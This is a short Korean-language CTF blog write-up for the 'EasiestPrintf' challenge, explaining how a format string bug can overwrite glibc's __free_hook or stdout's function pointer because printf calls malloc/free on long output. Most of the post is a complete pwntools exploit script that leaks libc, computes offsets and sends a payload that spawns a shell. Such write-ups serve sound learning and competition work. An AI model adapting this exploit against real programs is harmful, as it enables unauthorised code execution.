printf는 문자열이 일정크기가 넘어가면 malloc free를 호출한다(vfprintf) fsb를 이용하여 malloc_hook free_hook 을 덮어 쓸수 있다.
혹은 stdout의 함수포인터를 덮을 수도 있다.
32bit이기 때문에
write = {_IO_2_1_stdout + 148: 0x0804A570 - 0x1c, 0x0804A570: system + 1}
payload = '/bin/sh;'
payload += fmtstr_payload(9, write, len(p), 'byte')
출처: http://say2.tistory.com/262 [say2]
p.sendlineafter('Bye','/bin/sh;'+fmtstr_payload(9,{free_hook:system-0x08080808})+"%100000c")
from pwn import * p=process('./EasiestPrintf') libc=ELF('/lib/i386-linux-gnu/libc.so.6') binary=ELF('./EasiestPrintf') open_got=0x8049FE8 p.sendlineafter('read:\n',str(open_got)) libc=int(p.recv(10),16)-0xd5570 log.info("libc: "+hex(libc)) malloc_hook=libc+0x1b2768 log.info("malloc_hook: "+hex(malloc_hook)) free_hook=libc+0x1b38b0#0x1b3536 one_gadget=libc+0x3ac69#0x5fbc5 system=libc+0x3ada0 log.info("one_gadget"+hex(one_gadget)) log.info("system"+hex(system)) #0x5fbc5 0x5fbc6 raw_input() p.sendlineafter('Bye','/bin/sh;'+fmtstr_payload(9,{free_hook:one_gadget-0x08080808})+"%100000c") p.interactive()
'CTF' 카테고리의 다른 글
| [codegate2017]VM (0) | 2017.07.25 |
|---|---|
| [2017 googlectf] inst_prof (0) | 2017.06.19 |
| [codegate 17 final]BMP (0) | 2017.05.14 |
| [defcon prequal 2017]magic (0) | 2017.05.12 |
| [codegate17 prequal]postbox (0) | 2017.05.11 |